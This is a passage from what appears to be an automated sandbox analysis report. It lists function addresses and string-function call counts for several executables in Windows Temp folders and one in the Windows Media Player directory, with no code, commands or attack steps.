                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00FF88603_2_00FF8860
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00FF70493_2_00FF7049
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00FF31A83_2_00FF31A8
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00FB4B303_2_00FB4B30
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00FB4DE03_2_00FB4DE0
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00FF2D103_2_00FF2D10
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00FF779B3_2_00FF779B
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00FE7F363_2_00FE7F36
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F2B6009_2_00007FF643F2B600
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F2E7909_2_00007FF643F2E790
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F7E1709_2_00007FF643F7E170
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F261909_2_00007FF643F26190
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F7D2C89_2_00007FF643F7D2C8
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F383F09_2_00007FF643F383F0
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F5E4409_2_00007FF643F5E440
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F25D609_2_00007FF643F25D60
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F35EC09_2_00007FF643F35EC0
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F310F09_2_00007FF643F310F0
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F269709_2_00007FF643F26970
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F2CA909_2_00007FF643F2CA90
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F29B009_2_00007FF643F29B00
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F27C509_2_00007FF643F27C50
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F33CE09_2_00007FF643F33CE0
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F34D209_2_00007FF643F34D20
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F7D5449_2_00007FF643F7D544
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F7A65C9_2_00007FF643F7A65C
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F6A6989_2_00007FF643F6A698
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F586C09_2_00007FF643F586C0
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F8070C9_2_00007FF643F8070C
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F557209_2_00007FF643F55720
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F837749_2_00007FF643F83774
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F217A09_2_00007FF643F217A0
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F497C09_2_00007FF643F497C0
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F298309_2_00007FF643F29830
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F2D8A69_2_00007FF643F2D8A6
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F718B89_2_00007FF643F718B8
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F4F9109_2_00007FF643F4F910
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F501909_2_00007FF643F50190
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F321C09_2_00007FF643F321C0
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F7A1C89_2_00007FF643F7A1C8
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F6B1E49_2_00007FF643F6B1E4
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F6A2909_2_00007FF643F6A290
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F822989_2_00007FF643F82298
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F852F09_2_00007FF643F852F0
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F583A09_2_00007FF643F583A0
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F213D09_2_00007FF643F213D0
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F5D4109_2_00007FF643F5D410
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F6A4949_2_00007FF643F6A494
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F2E4AA9_2_00007FF643F2E4AA
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F73D409_2_00007FF643F73D40
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F7FDA09_2_00007FF643F7FDA0
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F32EF09_2_00007FF643F32EF0
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F70F309_2_00007FF643F70F30
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F51F309_2_00007FF643F51F30
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F6F0049_2_00007FF643F6F004
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F210009_2_00007FF643F21000
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F480109_2_00007FF643F48010
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F290309_2_00007FF643F29030
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F720409_2_00007FF643F72040
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F21A209_2_00007FF643F21A20
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F4EA209_2_00007FF643F4EA20
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F7DAD49_2_00007FF643F7DAD4
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F6EAF89_2_00007FF643F6EAF8
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F74C109_2_00007FF643F74C10
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F56CB09_2_00007FF643F56CB0
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F6ACDC9_2_00007FF643F6ACDC
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F7ACDC9_2_00007FF643F7ACDC
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F54D109_2_00007FF643F54D10
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F7ED1C9_2_00007FF643F7ED1C
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF68456B60011_2_00007FF68456B600
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF68456E79011_2_00007FF68456E790
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF68456619011_2_00007FF684566190
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845BE17011_2_00007FF6845BE170
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845BD2C811_2_00007FF6845BD2C8
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845783F011_2_00007FF6845783F0
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF68459E44011_2_00007FF68459E440
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF684565D6011_2_00007FF684565D60
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF684575EC011_2_00007FF684575EC0
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF68456697011_2_00007FF684566970
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF68456CA9011_2_00007FF68456CA90
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF684569B0011_2_00007FF684569B00
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF684567C5011_2_00007FF684567C50
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF684574D2011_2_00007FF684574D20
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF684573CE011_2_00007FF684573CE0
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845BD54411_2_00007FF6845BD544
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845AA69811_2_00007FF6845AA698
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845BA65C11_2_00007FF6845BA65C
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF68459572011_2_00007FF684595720
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845C070C11_2_00007FF6845C070C
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845986C011_2_00007FF6845986C0
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845617A011_2_00007FF6845617A0
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845C377411_2_00007FF6845C3774
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF68456983011_2_00007FF684569830
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845897C011_2_00007FF6845897C0
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF68456D8A611_2_00007FF68456D8A6
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF68458F91011_2_00007FF68458F910
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845B18B811_2_00007FF6845B18B8
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF68459019011_2_00007FF684590190
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845AB1E411_2_00007FF6845AB1E4
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845721C011_2_00007FF6845721C0
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845BA1C811_2_00007FF6845BA1C8
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845C229811_2_00007FF6845C2298
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845AA29011_2_00007FF6845AA290
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845C52F011_2_00007FF6845C52F0
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845983A011_2_00007FF6845983A0
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF68459D41011_2_00007FF68459D410
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845613D011_2_00007FF6845613D0
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF68456E4AA11_2_00007FF68456E4AA
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845AA49411_2_00007FF6845AA494
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845BFDA011_2_00007FF6845BFDA0
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845B3D4011_2_00007FF6845B3D40
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845B0F3011_2_00007FF6845B0F30
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF684591F3011_2_00007FF684591F30
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF684572EF011_2_00007FF684572EF0
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF68456903011_2_00007FF684569030
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845AF00411_2_00007FF6845AF004
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF68456100011_2_00007FF684561000
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF68458801011_2_00007FF684588010
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845B204011_2_00007FF6845B2040
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845710F011_2_00007FF6845710F0
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF68458EA2011_2_00007FF68458EA20
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF684561A2011_2_00007FF684561A20
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845AEAF811_2_00007FF6845AEAF8
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845BDAD411_2_00007FF6845BDAD4
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845B4C1011_2_00007FF6845B4C10
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF684596CB011_2_00007FF684596CB0
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845BED1C11_2_00007FF6845BED1C
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF684594D1011_2_00007FF684594D10
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845AACDC11_2_00007FF6845AACDC
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845BACDC11_2_00007FF6845BACDC
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 12_2_00007FF711D4399012_2_00007FF711D43990
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 12_2_00007FF711D55B1412_2_00007FF711D55B14
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 12_2_00007FF711D5FA5412_2_00007FF711D5FA54
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 12_2_00007FF711D5E20012_2_00007FF711D5E200
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 12_2_00007FF711D581A412_2_00007FF711D581A4
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 12_2_00007FF711D629B412_2_00007FF711D629B4
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 12_2_00007FF711D454C012_2_00007FF711D454C0
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 12_2_00007FF711D614A412_2_00007FF711D614A4
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 12_2_00007FF711D44C0012_2_00007FF711D44C00
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 12_2_00007FF711D573E812_2_00007FF711D573E8
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 12_2_00007FF711D53BD012_2_00007FF711D53BD0
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 12_2_00007FF711D5EDA012_2_00007FF711D5EDA0
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 12_2_00007FF711D4CD7C12_2_00007FF711D4CD7C
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD75EC013_2_00007FF61DD75EC0
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD65D6013_2_00007FF61DD65D60
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD69B0013_2_00007FF61DD69B00
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD6CA9013_2_00007FF61DD6CA90
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD74D2013_2_00007FF61DD74D20
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD73CE013_2_00007FF61DD73CE0
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD67C5013_2_00007FF61DD67C50
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD6B60013_2_00007FF61DD6B600
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD6E79013_2_00007FF61DD6E790
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DDBE17013_2_00007FF61DDBE170
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD9E44013_2_00007FF61DD9E440
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD783F013_2_00007FF61DD783F0
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DDB0F3013_2_00007FF61DDB0F30
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD91F3013_2_00007FF61DD91F30
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD72EF013_2_00007FF61DD72EF0
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DDBFDA013_2_00007FF61DDBFDA0
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DDB3D4013_2_00007FF61DDB3D40
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD710F013_2_00007FF61DD710F0
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DDB204013_2_00007FF61DDB2040
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD6903013_2_00007FF61DD69030
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DDAF00413_2_00007FF61DDAF004
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD6100013_2_00007FF61DD61000
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD8801013_2_00007FF61DD88010
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DDAEAF813_2_00007FF61DDAEAF8
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DDBDAD413_2_00007FF61DDBDAD4
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD8EA2013_2_00007FF61DD8EA20
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD61A2013_2_00007FF61DD61A20
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD6697013_2_00007FF61DD66970
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DDBED1C13_2_00007FF61DDBED1C
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD94D1013_2_00007FF61DD94D10
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DDAACDC13_2_00007FF61DDAACDC
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DDBACDC13_2_00007FF61DDBACDC
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD96CB013_2_00007FF61DD96CB0
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DDB4C1013_2_00007FF61DDB4C10
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD9572013_2_00007FF61DD95720
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DDC070C13_2_00007FF61DDC070C
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD986C013_2_00007FF61DD986C0
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DDAA69813_2_00007FF61DDAA698
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DDBA65C13_2_00007FF61DDBA65C
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DDBD54413_2_00007FF61DDBD544
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD8F91013_2_00007FF61DD8F910
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DDB18B813_2_00007FF61DDB18B8
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD6D8A613_2_00007FF61DD6D8A6
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD6983013_2_00007FF61DD69830
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD897C013_2_00007FF61DD897C0
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD617A013_2_00007FF61DD617A0
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DDC377413_2_00007FF61DDC3774
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DDC52F013_2_00007FF61DDC52F0
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DDBD2C813_2_00007FF61DDBD2C8
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DDC229813_2_00007FF61DDC2298
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DDAA29013_2_00007FF61DDAA290
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DDAB1E413_2_00007FF61DDAB1E4
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD721C013_2_00007FF61DD721C0
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DDBA1C813_2_00007FF61DDBA1C8
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD9019013_2_00007FF61DD90190
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD6619013_2_00007FF61DD66190
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD6E4AA13_2_00007FF61DD6E4AA
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DDAA49413_2_00007FF61DDAA494
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD9D41013_2_00007FF61DD9D410
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD613D013_2_00007FF61DD613D0
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD983A013_2_00007FF61DD983A0
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: String function: 00007FF61DD81B10 appears 35 times
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: String function: 00007FF61DD98F10 appears 31 times
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: String function: 00007FF61DD7F4A0 appears 112 times
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: String function: 00007FF61DD992E0 appears 33 times
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: String function: 00007FF61DD860E0 appears 31 times
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: String function: 00007FF61DD844A0 appears 127 times
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: String function: 00007FF61DD808C0 appears 31 times
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: String function: 00007FF643F41B10 appears 35 times
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: String function: 00007FF643F58F10 appears 31 times
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: String function: 00007FF643F3F4A0 appears 112 times
